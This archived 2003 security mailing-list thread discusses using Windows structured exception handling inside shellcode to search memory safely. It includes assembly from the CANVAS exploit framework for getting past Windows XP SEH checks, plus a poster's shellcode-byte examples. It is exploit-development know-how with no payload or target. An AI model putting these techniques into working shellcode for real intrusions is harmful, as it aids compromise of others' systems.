Re: Win32: Using SEH to search memory

dave_at_immunitysec.com
Date: 09/25/03

Date: 25 Sep 2003 18:05:48 -0000
To: vuln-dev@securityfocus.com
In-Reply-To: <3F72E421.7080604@edelweb.fr>

    From CANVAS's win32search.c, this is what you are looking for.

    Dave Aitel
    Immunity, Inc.
    CANVAS: All the hard work is done for you.

    //push the address of our exception handler
    push %eax
    //we are the last handler, so we push -1
    push $-1
    //move it all into place...
    mov %esp,%fs:(0)

    //Now we have to adjust our thread information block to reflect we may be anywhere in memory
    //As of Windows XP SP1, you cannot have your exception handler itself on the stack - but most versions of Windows check to make sure your exception block is on the stack.
    addl $0xc, %esp
    movl %esp,%fs:(4)
    subl $0xc,%esp
    //now we fix the bottom of thread stack to be right after our SEH block
    movl %esp,%fs:(8)

    >Date: Thu, 25 Sep 2003 14:48:33 +0200
    >From: "Nicolas RUFF (lists)" <ruff.lists@edelweb.fr>
    >To: Bob Askew <bdaskew@hotmail.com>, vuln-dev@securityfocus.com
    >Subject: Re: Win32: Using SEH to search memory
    >
    >Windows XP Exception Handler has new protections, such as :
    >- clearing registers before transferring control to the handler code
    >AND
    >- do not transfer control to a handler code located on the stack
    >
    >Cf . http://std.dkuug.dk/jtc1/sc22/wg21/docs/papers/2003/n1462.pdf
    >
    >If you run your code on a Windows 2000, it should work fine I guess.
    >
    >Regards,
    >- Nicolas RUFF
    >-----------------------------------
    >Security Consultant
    >EdelWeb (http://www.edelweb.fr/)
    >-----------------------------------
    >
    >> I'm trying to search through memory using structured exception handling
    >> to avoid crashing when accessing bad memory. Various buffer overflow
    >> exploits have used this technique for locating the address of
    >> GetProcAdd() or for locating shellcode planted in memory.
    >>
    >> I have an example written in inline assembly and compiled with Visual
    >> Studio on XP. It implements seh and searches through memory just fine.
    >> My handler handles the memory access violations. (Example 1 code below)
    >> However, if I stick my handler on the stack, then Windows doesn't send
    >> the exception to my handler. (Example 2 code below)
    >>
    >> Does anyone have any suggestions as to what I might be doing wrong? Does
    >> Windows care where a handler lives in memory? Can anyone recommend a
    >> good reference for implementing seh in shellcode?
    >>
    >>
    >> Example 1:
    >> *****************************************
    >>
    >> #include<stdio.h>
    >>
    >> //simple test for SEH with handler
    >>
    >> void main()
    >> {
    >> unsigned int cint = 0;
    >>
    >> __asm{
    >>
    >> jmp gethandler
    >> start:
    >> xor ebx,ebx
    >> xor ecx,ecx
    >> push dword ptr fs:[ecx]
    >> mov dword ptr fs:[ecx],esp
    >> search:
    >> inc ebx
    >> cmp dword ptr[ebx],0x00000000 ;//causes exception
    >>
    >> //exception cleanup
    >> xor ecx,ecx ;
    >> mov eax,[ESP] ; // Get pointer to previous record
    >> mov FS:[ecx], eax ; // Install previous record
    >> add esp, 8 ; //clean handler & fs[0] off stack
    >> jmp printit
    >>
    >> gethandler:
    >> call start
    >> handler:
    >> push ebp
    >> mov ebp,esp
    >> push ebx
    >> mov ebx,[ebp+10h]
    >> add ebx,0xa4
    >> inc dword ptr[ebx] ;//increment ebx
    >> xor eax,eax
    >> pop ebx
    >> mov esp,ebp
    >> pop ebp
    >> ret
    >> printit:
    >> mov [cint],ebx
    >> }
    >> printf("Last ebx = %x\n",cint);
    >>
    >> }
    >>
    >> Example 2:
    >> *****************************************
    >>
    >> #include<stdio.h>
    >>
    >> //simple test for SEH with handler located on stack
    >>
    >> void main()
    >> {
    >> unsigned int cint = 0;
    >>
    >> char unsigned bytes[] =
    >> "\xEB\x1B" // jmp gethandler
    >> //start:
    >> "\x33\xDB" // xor ebx,ebx
    >> "\x33\xC9" // xor ecx,ecx
    >> "\x64\xFF\x31" // push dword ptr fs:[ecx]
    >> "\x64\x89\x21" // mov dword ptr fs:[ecx],esp
    >> //search:
    >> "\x43" // inc ebx
    >> "\x83\x3B\x00" // cmp dword ptr [ebx],0
    >> //SEH cleanup
    >> "\x33\xC9" // xor ecx,ecx
    >> "\x8B\x04\x24" // mov eax,dword ptr [esp]
    >> "\x64\x89\x01" // mov dword ptr fs:[ecx],eax
    >> "\x83\xC4\x08" // add esp,8
    >> "\xEB\x1B" // jmp printit
    >> //gethandler:
    >> "\xE8\xE0\xFF\xFF\xFF" // call start
    >> //handler:
    >> "\x55" // push ebp
    >> "\x8B\xEC" // mov ebp,esp
    >> "\x53" // push ebx
    >> "\x8B\x5D\x10" // mov ebx,dword ptr [ebp+10h]
    >> "\x81\xC3\xA4\x00\x00\x00"//add ebx,0A4h
    >> "\xFF\x03" // inc dword ptr [ebx]
    >> "\x33\xC0" // xor eax,eax
    >> "\x5B" // pop ebx
    >> "\x8B\xE5" // mov esp,ebp
    >> "\x5D" // pop ebp
    >> "\xC3" // ret
    >> //printit: (clean exit?)
    >> "\xff\xd2"; //jump edx
    >>
    >> __asm{
    >> lea eax,bytes
    >> lea edx,printit
    >> jmp eax
    >> printit:
    >> mov [cint],ebx
    >> }
    >>
    >> printf("Last ebx = %x\n",cint); //probably will never make it here.
    >>
    >> }
    >>

